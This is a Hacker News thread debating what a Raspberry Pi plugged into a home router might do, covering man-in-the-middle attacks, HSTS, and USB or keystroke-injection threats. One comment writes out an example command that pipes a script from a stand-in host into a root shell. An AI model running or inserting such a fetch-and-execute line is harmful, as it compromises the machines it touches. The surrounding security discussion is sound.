Hacker News new | past | comments | ask | show | jobs | submit login
Found hooked up to my router (reddit.com)
965 points by empath75 on Sept 27, 2018 | hide | past | favorite | 347 comments

> I have a Raspberry Pi right now in my hands fron rentyouraccont.com, i have it running diagnostics on an Air-Gapped pc. This thing is wild. Every second it tries to connect to bot-net programs. It not only buys ads on facebook (which btw i cannot find code that it actually does this) but it is creating links to malware ridden embeds. It is part of a Botnet, i can say for sure. Every second it tries to establish a connection to the botnet, its like a bee thats lost its colony. Register for one and put it on an air-gap, you wills see excatly what im talking about. It records EVERY KEYSTROKE sent of the network, even SSL connection.

so this was a linked comment from a thread 3 years ago....

How is that even possible? How does it capture keystrokes (unless you mean Google searches where each key is sent for autocomplete). How does it break SSL?

It's probably not this attack but any WiFi device can probably be used to key log you.


This is legitimately astonishing.

It's not great.

Some areas of IT are in guarded rooms, with walls of a certain thickness, filtered power, external RF signals killed, and airgapped except for specific patterns for transfering between external systems.

You probably just want to buy a yubikey and accept a lot of computing is built on a house of cards with respects to trust.


I think that by "every keystroke" he meant "every network packet".

Which would capture passwords in plaintext sent from the user side, no?

Yes, but browsers give huge warnings about password fields on non-SSL sites. Password in the clear won't happen with any major website.

If the site is non-SSL, then there's nothing stopping somebody in control of the network from replacing all "password" fields with plain "text" fields, and then applying a custom font to them so every character entered is displayed as a "•"

That's basically what a password field already is. That would make no difference to anything - the password would be sent over the network in exactly the same way either way.

Right, but some browsers display a small warning message when you select a password field on a non-https page [1]

If instead of a password field it's a text field with a custom font, no such warning will be presented.

[1] https://blog.mozilla.org/security/2017/01/20/communicating-t... http://http-password.badssl.com/

No. The point of switching out a password field for a text field is to prevent the browser from warning about the existence of a password field on a non-HTTPs secured page. This is a well known, and old trick.

There's a little "not secure" at the top in Chrome, something most users will simply ignore.

Not so little when the user is also typing into a password field

I can imagine an HN commenter scrutinizing things when encountering that warning, but it's not very actionable for anyone else.

"Ah, okay, it's not so secure, whatever that means... but I still want to login and do what I set out to do."

Do they? I don't think so...

Try http://login.ebiquity.com

Do you see any warnings in your browser? I see no warnings in Chrome.

This is shown in firefox: https://files.catbox.moe/srdxhe.png

Interesting. With the latest version of Chrome on Linux I see no warnings whatsoever...

Sooooo easily ignorable.

Safari shows a red "Website not secure" in the address bar like this https://i.imgur.com/6DXzZ8G.png

Chrome changes the "Not secure" in the address bar from grey to red (and displays a red explamation mark symbol there) when data is entered into the form.

Which version/OS? I have the latest Chrome (69.0.3497.100) on macOS 10.13.3, and I see no red exclamation mark. Nothing changes or warns me at all when I start entering data in the fields.


Maybe you have a browser extension, or setting turned on that I'm missing?

It's not enabled by default on the latest Chrome, at least for macOS (10.14). You can enable it using the #enable-mark-http-as flag, after which HTTP pages with password fields will look like this:


This is in Version 69.0.3497.100 (Official Build) (64-bit), Windows 10.

This happens regardless of extension (i.e. in an incognito window).

> so this was a linked comment from a thread 3 years ago....

While major websites already were on SSL, a lot of websites didn't and there were no browser warnings yet.

The box controls the DNS; majorwebsite.com points to any sever the attacker likes.

The only defense is HSTS/certificate-pinning, for sites previously visited with that browser & device (it’s a TOFU security model).

HN has HSTS, but not Reddit, or my credit union, or my local pizza place, or Kaiser Permanente, etc. etc. etc.

EDIT: I believe e.g. Chrome and Firefox bake in some major certificates, which would also likely flag MITM attacks, for those sites.

EDIT II: Someone responded below (since deleted) that you’d also need that cert to be signed by a CA your browser trusts, which is true. My explanation is faulty/poor. Better informed discussion of attacks further down the thread!

That's assuming the box can generate certificates trusted by the target machines - there's a reason the CN field exists.

The X.500 series Common Name is a weird thing to fixate on here. It's an arbitrary free text "name". The only reason it's even sometimes useful in the modern era is that the CAB BRs say it has to match one of the SANs so it will probably be a DNS name. But even there good luck, it took until 2016 or so to get the last stragglers to obey that rule properly without "misunderstanding" it and unlike SANs it isn't defined to be DNS A-labels so it may have arbitrary Unicode text.

Most browsers stopped even looking at CN or only do so for people's crappy home grown private CAs

Anyway, what makes certs trustworthy isn't the CN, it's a chain of two or more digital signatures leading to a trusted root. And the CN in that root, while it had to be truthful when written, may be twenty years old, so it's nonsense now.

Good luck finding anyone willing to issue you a cert that's valid for 20 years.

Leaf certificates have a maximum permitted lifespan of 825 days (down from 36 months)

But I wasn't talking about leaf certificates, I expressly mentioned this for the CN in _root_ certificates and it's pretty common for those to have a lifetime of ten, fifteen even twenty five years.

Here's an easy to remember example, https://crt.sh/?id=1 the first entry in the crt.sh database.

The Common Name on that certificate is "AddTrust External CA Root". So... who are AddTrust? I actually have no idea. This root is today controlled by Comodo, a CA in the United Kingdom but you'd never guess that from the certificate.

> That's assuming the box can generate certificates trusted by the target machines - there's a reason the CN field exists.

If you're dumb enough to install one of these boxes on your network, you might also be dumb enough to install an attacker-provided root certificate on your PC.

But if you ask your user to install a CA, why not simply ask him to install malware?

Is it to circumvent antivirus?

the sort of people who could be convinced to install one of these things on their network in exchange for a theoretical $15 per month wouldn't be detered by a broken SSL warning.

Eh.. no. It’s going to pickup worthless SSL encrypted TCP packets but not keystrokes.

People need to calm the hell down here. If you’re connecting HTTPS to most of the web, the only thing this thing is going to do is collect worthless packet traffic. Woot woot.

It’s not meant to collect data, it’s meant to act as an agent to a larger network of these things to collectively impact something or another in whatever way. But they could give 2 poops about the traffic on your local network.

I agree, people are really looking into the keylogger theory, but actually I think the goal of the scammer is to have a "legitimate" (residential) internet connection with which to register hundreds of online accounts, or purchase ads, etc. If the IP gets blacklisted by a service (like Facebook), no problem, the account holder will probably notice that they can't get to Facebook anymore, call up the ISP and get a brand new IP address. All this for just $15/month.

One comment in that thread[1] gives a full explanation of what such a Raspberry Pi device hooked up to the router can do: forward all the network traffic, replace router's stock firmware with its own, install software on the network connected devices via known vulnerabilities, spoof websites by acting as custom DNS server. In my opinion, it looks like "a Pi-hole[2], but for phishing".

[1] https://www.reddit.com/r/whatisthisthing/comments/9ixdh9/fou...

[2] https://pi-hole.net/

I still don't understand how this device could steal login details. Everything should be encrypted and authenticated through PKI when using any website that accepts login details. Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.

>Everything should be encrypted and authenticated through PKI when using any website that accepts login details.

Yes, everything SHOULD be like this. I should be able to trust my neighbors and leave my doors unlocked as well, and I should be able to have faith in my elected officials. And yet...

The other issue is that you can connect to a website that implements HTTPS correctly, and still be borked if that site doesn't implement HSTS properly - there are tools that implement HTTPS downgrading on Kali.

>I still don't understand how this device could steal login details...Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.

The problem comes when your corrupted router messes with DNS and sends you to https://evil.chase.com, which has a pixel perfect mock up of a chase bank login screen, and a perfectly valid cert.

I'm disappointed that's not a real website

It is a real website he just got the URL wrong. Its supposed to be https://www.chase.com/

I live for these kind of zingers!

Of course it's not real. Its a subdomain of chase.com. Parent should've said something like chase.evil.com.

If the user hasn't visited the subdomain evil.chase.com yet, a http downgrade attack (https://news.ycombinator.com/item?id=18090419) would maybe work.

That's not a downgrade, but a lack of upgrade. A few comments back said https://evil but it would have to instead be http://evil assuming no rogue root cert is installed.

And requires that if the user had visited chase.com, that chase.com not have includeSubdomains in their HSTS header.

So to prevent a downgrade attack before a first connection is made, not only does the domain need to "includeSubdomains" - and have a valid lifetime (maybe of at least 31536000 seconds, or 1 year [this may just be a government standard]), but they'd also have to send the preload directive in their HSTS header and have been preloaded by that browser platform. If the domain is not preloaded, that first connection is required to get the HSTS information to the client in the Strict-Transport-Security header.

Perfectly valid cert how? Assuming no theft of a chase private key.

Perfectly valid cert for the evil.com domain - someone below pointed out that I flipped the domain names.

In reality the "evil" page would look something like "https://www.login.chase/login?id=DEADBEEF/.evil.com". For a non-trivial number of users, that's enough - "I see the nice green lock, I see chase, and some crazy web address characters that are always there".

Huh? "https://www.login.chase/login?id=DEADBEEF/.evil.com" wouldn't go to evil.com, it would go to login.chase. "chase" is the TLD of that URI.

Unless you're doing something super clever with characters that I'm not understand, that's not how urls work. ".evil.com" is clearly part of the query parameter.

Assuming they're not doing anything weird with Unicode, the evil pi is probably running its own DNS server, intercepting the traffic intended for normal DNS, and basically creating its own TLD the same way you would normally do localdomain. The evil.com part is redundant.

Sure, that's a totally different scenario than tricky-looking urls.

This seems...a little unnecessarily pedantic. It's an example of a well-known URL obfuscation technique -- we all understood what he meant.

For example you can go to my http://website.com now the normal website has a HTTPS redirect on home page. Your router replaces that page and disables the redirect. Now is up to you to notice you're on a http connection.

If you think is rare, I can tell you some fortune 500 FX and stocks trading have this vulnerability a year ago (didn't checked again).

This is why certificate pinning and modern web security practices are so important. On a well configured site, this attack would fail.

If you had never visited the site, how would modern security practices have prevented the attack?

HSTS is useless in this case isn't it?

Correct. HSTS does not protect against a first visit to a site. And to work around HSTS, there are many ways to get users to clear their caches, install new browsers, or use new devices to browse sites they've already visited.

Technically, if the domain had DNSSEC enabled, it might prevent this kind of attack, but no regular consumer is using a validating stub resolver, so even DNSSEC wouldn't work.

Now that browsers are saying "Not Secure" by default for HTTP pages, users are apparently expected to notice this popping up where it didn't before and realizing they're on a phishing site.

Many sites can be included as HSTS only in Chrome itself, so it wouldn't be entirely useless.


Anyone can preload their domain in Chrome, Firefox and others that share the preload list. I'm not sure what vulnerabilities are left after your site has been preloaded.

The only vulnerability left would be, as mentioned above, a client installing a browser that doesn't support HSTS.

If your attack relies on getting the user to install your own browser, don't waste your time with a simple HSTS bypass.

No. If the domain (and its subdomains) are preloaded - then a first visit is not required. The HSTS requirement is then baked into a list supported by modern browsers such as Firefox and Chrome.

Preloading always include subdomains (it's not possible to preload just tld).

HSTS and Certificate Transparency, yes. Certificate Pinning is too easy to shoot yourself in the foot with, so it should only be considered for the most sensitive sites.

Dynamic pinning (HPKP header) is being rolled back from browsers because of the reasons you mention. Only a small set of static pins will remain (in Chrome, Google sites for example).

I think the idea is that it could proxy communication. Mitm

you still have to install the proxy certs

Pick your favorite windows 0-day and use it to only install a cert and nothing else that would tip off AV software.

Are Windows 0-days really that common? I thought they were usually saved for really serious attacks, e.g. from state-sponsored actors, not scams on the level of "pay some random person $15 a month to attach a mysterious device to their router".

I can't answer your question authoritatively, but there are plenty of organised criminal enterprises in the world with state-level resources.

Not just a question of state-level-ness, but of targeted/mass. Burning a 0day on a mass scam is really, really stupid.

Not only that, but because the device has unfettered access to the internet, an attacker can always update it with new ways of installing certificates on your machine.

You don't even need 0-days, as most users hate updates and try to disable them, every single time.

Assume one of many attack vectors:

any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.

If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.

DNS can be mutated.

Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.


Hundreds (if not thousands) of repeatable attack vectors given physical access to the network like this.

HTTPS protects against all of these:

> any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.

Which is why everyone is moving to HTTPS.

> If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.

If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.

> DNS can be mutated.

Which won't allow you to MITM HTTPS sites.

> Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.

Any auto update software which doesn't verify certificates has a major security vulnerability.

>HTTPS protects against all of these: >Which is why everyone is moving to HTTPS.

Yes, but a MiTM can block or hamper conversion to https and mutate the content. HPKP and HSTS are not widely used yet (and even if they are the first request can be bypassed given this topology). Given current "end user" level protections having a device such as this on your network basically ensures you can be hijacked if even one request made is over https or not currently pinned to HTTPS.

>If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.

FFS, the point is the MITM gives a huge amount of attack surface to breach the client -- which yes, after that is done you lose all bets. Everything from injecting code intip zips/exec/etc downloaded over http to using 0day browser exploits and mutating requests. The device itself is physical access to your network which makes access to the clients 1000x 9if not more) easier.

> DNS can be mutated.

There are other protocols besides HTTPS.

>Any auto update software which doesn't verify certificates has a major security vulnerability.

Given, Yes. That does not make it rare or unusual. look at the CVS. There are many developers that write (or enable) auto updaters that should not be responsible for that given their understanding of security.

It's amazing how many people forget that Raspbian is still Linux under all the Wolfram and Raspberry Pi stuff. So you essentially have a tiny computer that can be plugged into almost anything you can program for.

Do people really forget that? I thought that was the whole point of raspberry pis.

It depends on what you're using it for. I bought a kit for setting up a retro-pi because I didn't feel like checking to ensure the parts were all compatible. It gives you step by step instructions to set it up, and none of it requires knowing anything about Linux. You just download an image file, write it to the ssd, and when you plug it in it does all the setup itself and you're just presented with the retro-pi GUI. The only hint that it's Linux under the hood is when the names of processes scroll past on the screen as it's booting.

Nobody using a raspberry pi forgets that.

If they picked it out and bought it, yes, obviously.

However, there are a lot of products sold that perform selected tasks that run on preconfigured raspis with the consumer none the wiser. Kodi boxes, emulation kits, scientific plug-and-go kits, and much more.

I have been offered or asked about things running on raspi hardware on many occasions by people who were none the wiser to what platform they were using, and we recently had an event where we gave out around a hundred of them preloaded with run-once synchronized software for an event. How many of those people knew for certain they were holding Raspberry Pi Zero W boards with pared down Linux kernels? None.

They're a lot more commercial and common than a handful of snarks with downvotes realize, and OP doesn't deserve to be punished for that.

Keep in mind that all modern routers are also tiny computers running a Unix variant like busybox. They can run arbitrary programs and they’re connected to everything you have by default.

Really, people forget that Raspbian might just possibly be related to Debian?


Is a disk image of one of these available anywhere?

I find it much more likely that these are being used for what they say they are (basically a proxy so they can buy ads from a residential IP) than some crazy MITM device. The "Attacker" is basically renting an IP connection or paying a co-location fee for their little server.

Plugging a device into your network doesn't make it magically see all the traffic. It would have to be doing ARP spoofing, DHCP hijacking, or hacking the router config/firmware. Is it possible that it is doing some or all of those things -- sure. But why? That could all be done via a malicious client executable that would give you access to the network and much more and is much more discrete than a physical box, so why would someone go through the trouble of shipping out a box + paying the recipient? The more simple explanation is the sender of the device is doing nefarious actions on the internet and needs a bunch of IPs for cheap so when they get blocked they can just move on to the next IP.

Would I put one of these on my home network - hell no. But if one of my friends tells me they had one plugged into their network I wouldn't immediately assume that their entire digital life was compromised. I would tell them to unplug it though.

Well if they are willing to break TOS to sell ads on facebook how much further do you need to go to rationalize auth capture, rootkit injection or any other malicious activity.

"Plugging in the device on your network doesn't make it magically see all of the traffic" ... Assuming it has not been constructed to do all of the things you list (or more) does not magically make it not see all of your traffic either. There is no magic involved, it is either constructed to capture/inject or not -- the only way to know is to review the actual bits and firmware.

Unless you work in a SCIF (and probably not even then) your local network should not be considered trustworthy. Assume that hostile activity is always present. Especially if you have "appliance" type stuff on your LAN, such as ISP-provided routers, Amazon/Google devices, smart light bulbs, etc. Keep your machines and firewalls updated.

> Well if they are willing to break TOS to sell ads on facebook

What TOS? Facebooks? Why would they be bound by it?

Well personally I do see a small distinction between breaking a corporate TOS and felony unauthorized network access.

Unless OP is someone very special, all their private data isn't worth 15 dollars a month.

I suspect this device is far more likely a broadband speed testing agency trying to get speed test results from different consumer ISP's, taking WiFi and the customers device out of the picture.

I disagree; the plug-in-this-Raspberry-Pi scam is unfortunately not uncommon, and not at all related to broadband testing AFAIK. A company called rentyouraccount.com runs a similar scam, and their service explains what the Pi is doing:

>Facebook has several mechanisms in place to protect your account. We make every attempt to work within the these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.


Sounds true, although I question why they don't simply install a proxy extension in the users browser. Would save them a lot of capital expenses.

Yes. You’re right. These things don’t care about local traffic. SSL would ruin its day if that where the case.

This is meant to be an agent to a network of these things. Not sure what the total point really is, but I can pretty much guarantee it has absolutely no cares about the local traffic.

> Plugging a device into your network doesn't make it magically see all the traffic.

Isn't that exactly what Wireshark's "promiscuous mode" does?

For wired Ethernet it depends on whether the traffic even reaches that port or not. Old dumb Ethernet hubs used to pass all traffic to all ports, but modern switches only send traffic to the intended destination.

It will show you everything coming out of the switch port but only traffic to/from the connected device will come out the switch port.

You have to use ARP poisoning or some other trick to get other network devices to send ethernet frames to your mac address in order for the switch to forward them out your port.

If someone would ship this to our office with a note like "attach this to a LAN port" chances are it will get attached. And we're a software house. People tend to pay attention to viruses, etc.. but not physical security.

At a previous employer (Fortune 500, not a software co.) the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network. IIRC there was a depressingly high (> 50%) rate of them being plugged in.

> the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network.

Which is clever, but given the current level of small scale integration you could just as easily hide the same exploits inside of a charging cable, a USB fan, or really any other small-form factor USB-pluggable gadget. The problem isn't them discriminating between "hacked" and "non-hacked" devices -- it's them plugging _anything_ non work related or issued into their USB ports.

Anecdotally, I heard of a toy radio control quadcopter belonging to western military personnel in Afghanistan that turned out to be trying to phone home to ${badguy} when they plugged it into a laptop to charge. This stuff is everywhere, and has been for years.

This is why I keep a large supply of "USB Condoms" (little dongles that short circuit the data, and allow charging/power only)

Product idea: internal condoms for every USB port on a business computer. Let employees charge their phones in USB ports or plug whatever in, data wires never connect - problem solved: Employees can charge their ${device} without risking security compromise of the host workstation.

How is that better than epoxy squirted into all unused ports of your existing computers while also distributing fast charging USB wall warts across the office like confetti? Even the good ones are relatively cheap, especially if bought in bulk. Relative to the cost of a desktop computer they're practically free.

(I'm genuinely surprised that the standard DELL and HP corporate workstation doesn't have its front USB ports deleted and its rear port access covered by a lockable metal cowl.)

How do you know the wall wart is not a fake one?

I noticed that with my mobile wifi (Huawei) which I generally leave plugged in, when my friend plugged in her Windows 10 tablet to the same power outlet (2 sockets), it suddenly noticed it as a new USB device. I don't ever plug anything in there except a charger for my bike light so had never noticed but I don't know if it has an autorun to install drivers they often do. Obviously the data wires are joined there..

How do you know your security guard is not a fake one?

At least on Dell, USB ports can be disabled in the BIOS (with separate options for front and rear ports). Disclaimer: I haven't tried to do it so I don't know if it actually works.

Caveat: you'll need to hire a lot more IT people because everyone in the company will be lined up out the door with complaints. "This computer doesn't work with my keyboard, I need a new one." "My mouse isn't working." "This computer won't read my flash drive and I have to get this file to accounting by 10:00!" "This computer isn't working with my pen tablet and the deadline for getting these graphics done is tomorrow!"

So you'll have to replace all of your intentionally-broken computers with good ones, which will cost a fortune on top of all the employees' lost work time and no one will want to buy the broken computers from you so you'll have to pay to have them scrapped.

Disabling USB ports, for example in the BIOS, is very common in larger corporations. Dell sell a secure cover to prevent access to the rear ports.

The person with the accounting data on a USB stick will get a formal reprimand for breaking the security policy.

You still need to hook up stuff to a computer - mice, keyboards, those weird 3D-mice our CAD people use, printers, and these days even displays are all attached to USB ports. And since the ports USB replaces have mostly gone, there is little alternative left.

At work, we keep a couple of power-socket-to-USB chargers around, if people want to charge their smartphone they can grab one. But simply disabling the USB ports on our users machines is not a realistic option at this point.

Wouldn’t everything then only charge at 100 mA?

No, shorting the data pins signals "this is a charger, you can charge as fast as you want, until it's so much current that the voltage starts to drop too much".

Except when the device is designed to prefer chargers from $vendor. LG was notorious for this some years back.

Which is totally redundant because that can be done on operating system level, but hey, bottled water is a huge industry too.

Epoxy can't break with a security update

you could warm it up and pick it out when soft though

Epoxy doesn't melt. It burns--at a temperature where your computer case starts melting.

Not if it's the right kind of epoxy...

USB drivers can still be vulnerable, though.

A previous employer would buy modified motherboards with the data traces removed/cut.

So these IT genuises at a Fortune 500 company were clever enough to test their employees' computer security acumen (and get the predicted result) but they weren't clever enough to simply block all use of USB mass storage devices on their corporate operating system distribution?

Surely by now all corporate desktops should be configured to not respond to any USB devices other than the generic HID for mouse and keyboard, plus a whitelist of approved devices (e.g. fingerprint readers, Yubikeys). Inserting a USB mass storage device into a corporate workstation should result in nothing. Plug-and-play shouldn't be triggered. The mass storage driver should not load.

The computer security industry for SMBs is like 95% theater and 5% actual practice.

Conducting that test produced something tangible for whoever made the purchasing decision: It clearly illustrated a need for the services rendered, did it in a way that offered job security to management by giving them license to assert the position over their subordinates, and established a metric by which to evaluate the security company's performance which can be easily, repeatably, and predictably improved over time.

It also checked a lot of boxes that will be useful in court if they ever need to prove that they weren't negligent on privacy and security, which is a form of insurance that has real measurable value when it comes to legal claims.

> The computer security industry for SMBs is like 95% theater and 5% actual practice.

I'd say it's 40% paranoid arse-covering by IT department heads, 35% whatever middle management incorrectly assumes to be current best practices, 20% ego-stroking by the CIO, and 5% sensible context-driven decision-making by IT front-line staff.

Those numbers sound a little thin on the bottom, but only a little. Maybe take 15% out of the CIO category and just throw it away, because they're usually very quick to turn on their underlings.

Trouble is that the same corporation has the following additional policies:

* A ban on mail attachments of certain types (excel, zip files...) * mailbox limits from the 1990’s (100MB or so) * a ban on Dropbox, Gdrive or any other file sharing service * No public facing sftp or similar * A web site so mired in red tape that it takes 6 months and a dozen approvals to get anything uploaded.

Often the USB drive or something similar is the only way for employees to actually do their jobs.

It seems the problem is bad corporate file sharing policies that are incorrectly validated as successful because the employees are using workarounds rather than pointing out its inadequacies.

One of many depressingly common pathologies in large organizations. The best way to ensure your infrastructure won't break is to ensure it's not used; whether or not that means people can do their job is a concern for a different department.

Welcome to the real world! :)

I have seen this kind of situation, too. It sucks, but if you play by the corporate rulebook and lobby for better rules, you will be either worn out or retired by the time those rules get updated.

In these situations the organization really should get box.com subscription (or Dropbox enterprise) and have file sharing with control, auditing and org policies.

Don't believe generic hid is safe either. You could make a device that pretends it's a keyboard and automatically inputs win+r curl http://evil.com/script.sh | sudo sh sleep alt+y.

Sorry for mixing windows and Linux but conceptually something like this should work on windows if you don't require password in your UAC prompts.

I wonder if a big (Fortune 500) company could get HID devices which were customised so that only company owned devices could be plugged in.. it shouldn't be that hard to design such a device that would show up as a custom device then the installed driver would poke it in a crypto shielded way and it then provides the keyboard/mouse inputs. It can't simply do the standard 'detach and reattach as a HID' because otherwise then a HID would work..

Hm, perhaps.. is anything like that available already?

Please no, don't add DRM in keyboards.

Just leaking data requires no UAC!

I don't think I've ever heard of a company that actually does this in practice. I suspect it ends up simply being more trouble than it's actually worth. I know at that company the list of approved device would probably end up being dozens of pages long... and yeah, thumb drives and USB hard drives were used a decent amount, especially outside of IT.

Maybe someone needs to invent a USB-based thumb drive reader that only allows generic mass storage devices to be attached but does not work as a hub, rather as a proxy device.

Bonus points: don't mount the drive directly, instead connect it to a centralised server on the corporate network that scans for threats and mounts a sanitised version of the drive's contents as a network share.

Triple word score: audit everything contained on every drive and everything that is copied on and off.

Sell that for $200 per unit to Fortune 500 companies and paranoid government agencies worldwide... and you'll retire early.

Your triple word score is already handled by a dozen different companies doing endpoint security from advanced heuristics at the kernel level like Crowdstrike, or just filenames and hashes like Code42.

isnt that a NAS basically?

A consumer (i.e. workplace for people who don't know better) NAS is usually Linux with a few hard drives attached via a cheerful and brightly coloured web UI - occasionally useful, some way short of secure.

I expect someone sells hardened ultra-secure corporate NAS boxes, but I've never seen any in the wild.

The trouble is, the sort of people who would buy a pre-hardened NAS are also the sort of people who would be suspicious of a pre-built unit. I know for sure I wouldn't trust anything off the shelf, I'd take the base OS and build something around it.

Whoops, my tin-foil hat appears to have slipped.

Anecdote for anecdote, I have.

Work at a fortune 500 company, we're currently eliminating USB ports for data devices - but leaving them open for other devices that do not identify as media.

We are dragging people to a corporate cloud solution, however we are finding that the drive to cloud has severely underestimated the volume of data that people will sync across the network, and how much work is done outside official corporate systems and in Excel instead.

This is having 2 effects our network capacity is being drained, and users are reporting performance issues due to latency associated with poorly developed excel applications.

It's a pentesting technique, used to assess the level of effectiveness of user training.

While your final comment is accurate, it is impractical as usb mass storage is still required in many places. Also, you can't effectively block HID, and an attacker can use HID disguised as or in a thumb drive to successfully attack a network.

I’m not sure I understand what the big deal is unless your machine tries to run software automatically from devices that are plugged into it. If you plug something into a centOS machine it’s not going to be able to do anything until you mount it and even then why would code be able to run from it?

Well for starters, if you’re curiously plugging it in, you’re going to mount it aren’t you?

Second, it can emulate an HID keyboard device and type keystrokes faster than you can react and pull it out, at which point it’s far too late - it’s pulled a secondary payload down or mounted a USB mass storage device and you’re owned.

You got me at the emulate a keyboard thing. Now I’m thinking that you shouldn’t plug strange keyboards or mice in because they could have an onboard payload. The crash cart at a data center is kind of a dumb idea in a way except the place is full of cameras usually

You're absolutely correct.

You know those little desk fans that come with a USB now and also an adapter to plug into the electrical outlet. I don't plug those into my laptops ever - who knows if there's a payload on them.

I will say this. I currently work, and have worked at, a few secret and top secret facilities - and the number of people I see plugging those (and similar) devices into their laptops is scary.

> the number of people I see plugging those (and similar) devices into their laptops is scary.

If such a device is able to cause a compromise / incident in a secure facility, well, several different "failures" at several different levels have occurred in order for it to get to that point.

Yeah, it irks me that this is seen a "stupid users" problem when our OSes are programmed to automatically execute code on a USB stick. I don't think the users are the stupid ones in this scenario.

> If you plug something into a centOS machine it’s not going to be able to do anything until you mount it ...

You may want to double check your CentOS desktop's defaults (you might be surprised).

My most critical machines have a file named /etc/modprobe.d/disabled.conf with entries such as these for dozens of filesystems, network protocols, and such:

  install usb-storage /bin/false
  install vfat /bin/false
When absolutely required, they can quickly be temporarily commented out (but not by mistake) and there's some very extensive auditing rules that keep an eye on things at that point.

It's really not that hard to lock a machine down and yet still have it actually remain usable. With the exceptions of the few security-focused distributions (Qubes OS, Tails, etc.), I can't think of any Linux distribution / desktop environment that even comes remotely close to doing anything like that (OOTB) by default, though.

Proof of concept: https://samy.pl/poisontap/

Reading through the sequence of what that does... nasty piece of work that. And kind of brilliant.

...because there are still bugs being found in the USB handling code that can occasionally be exploited for code execution.

A lot of IT security teams do this. On one side it is depressing, but on another side it is annoying to have to hear them talk about it every staff meeting. All companies seem to have people with zero understanding of computers and will fall for anything. I wonder how effective the education is. I guess if it prevents one attack it can pay for itself.

> it is annoying to have to hear them talk about it every staff meeting

Aren't you shooting the messenger?

Only a little bit. Most IT CyberSecurity teams can use bad stats to justify their value and additional staff, so they want to bring it up at every opportunity.

I don't necessarily disagree, but power users often get frustrated by red tape applied to everyone and not just those who consistently misuse their computer privileges.

I was at a financial software firm that dealt with USB security issues by filling the USB sockets with epoxy. The keyboard and mouse could not be removed from their USB sockets as they were held in place with a metal collar bolted to the case.

Simple and effective, although it destroyed any resale value of the PCs.

Do businesses (other than super small startups) actually sell their old hardware? Genuinely curious.

In my company (Fortune 500), we get new notebooks every 3 years and IT persistently pesters owners of old notebooks to return them. Given the sheer number of devices, I can imagine a reselling contract to be a nice additional source of income.

In this company's case the PCs were the cheapest of the cheap. Bottom end Dell and HP stuff.

when they were life expired they were given over to a recycling company, whom I assume would take the time to pick the epoxy out of the USB sockets or probably just replace them. I think buying new USB sockets and connecting ribbons to the motherboards is probably quite cheap these days

In the US, above a certain size you're basically required to sell off the old hardware because throwing it away counts as polluting, and the people who dispose of exclusively tech stuff charge you for that service.

Yep, look on eBay for sellers that specialize in refurbishing them. It's a great way to get something like an older Thinkpad for really cheap. Perfect for a Linux laptop that doesn't need the latest and greatest.

That's shocking. I know people are dopey, but 50%? I'd have guessed 20% at most.

Never underestimate the distribution of stupid. I worked at a hardware / software company where management distributed USB drives as a reward for something or other. The USB drives weren't even in blister packs they were just loose in plastic envelopes. I threw mine out, and wrote a complaint.

Companies routinely distribute software/presentations/etc. on USB drives. I suppose it's poor security hygiene these days but it's still routine.

Especially when stupid is an observable attribute in the industry.

Time and time again the technology industry has failed to consider security as a serious issue, never mind develop systems that are robust and transparent.

We don't have botnets, booby-trapped mail attachments, script-hackable servers, USB drives that can carry a viral payload, and all the rest because users are stupid, but because the industry's default culture is to think of security as an esoteric side issue, and not a non-negotiable critical feature in all IT systems.

More specifically, they tend to view it as a cost center that does nothing to increase profits.

Thing #1 to remember if you're in infosec is that you must pitch it based on the money saved by not having expensive problems like having to hire outside consultants and auditors after a breach.

I would guess that some people may try more than one, or if there are lots of people and few thumbs given time someone more gullible will try them.

This is how stuxnet got into the Natanz facility I think. They left a usb stick in the parking lot. Someone picked it up, plugged it in.

No, iirc stuxnet spread itself without anyone physically leaving a USB stick anywhere. On a system infected via the network, it would try to infect any USB drives connected to the system.

Stuxnet is fascinating. Still, as far as I can tell, the most complex, interesting malware ever found in the wild. I believe it's unclear how stuxnet found its way into the enrichment facilities.

It did contain a USB device exploit delivering a dropper with a completely separate payload specifically targeted at the Natanz facility. A compromised USB device picked up in the parking lot would do the trick, but there are certainly other ways to get something through the front door and that information is unlikely to be public knowledge any time soon.

I do remember reading about that. It exploited a bug in windows to load an executable when the usb was plugged in. It then installed a usermode rootkit and hid its files.

I likely got the "parking lot" impression from Alex Gibney's Zero Days, but it's been a few years since that came out.

It probably got in via usb in the parking lot, but there hasn't been an official statement that I know of. It was confirmed that the hack into the DHS intranet was done by USB stick in the parking lot.

Natanz was air gapped. Stuxnet penetrated the facility on a phisical device, once inside it spread over the LAN. The Widespread distribution of it on the open Internet was because of a bug in the code.

> The Widespread distribution of it on the open Internet was because of a bug in the code.

It's presumed that the Israelis got a little bit greedy and, even though it was doing it's job, tried to make the virus do it's job a little better. They made it more virulent which made it spread outside of the systems it was only targeted to spread to.

My understanding is that stuxnet got out of Natanz, by mistake. The world was never supposed to see that code. It was planted inside the Natanz secure perimeter.

Well, certain versions of stuxnet were sent to Natanz suppliers first, and I believe the infection made it out into the world from one of these suppliers, not Natanz itself.

If you lack physical access to the parking lot, the classy way to launch your cyber attack is by miniature trebuchet.

This is why, as much as I hate it most of the time, it's a good idea not to have your devs with access to your network setup. If your a small shop, limit the access as much as reasonably possible.

Emphasis on reasonable. If you limit workers' access too much for them to do their jobs they will find creative workarounds. Some of those can be more dangerous than just giving them the access that they need in a way that you control. Examples being if you make it so that the only way developers can debug a system is by adding in backdoors, or if you lock down the network so much that they need to use an unsecured public network to do their work. I've seen those things happen. Developers and IT need to work together, not be adversaries.

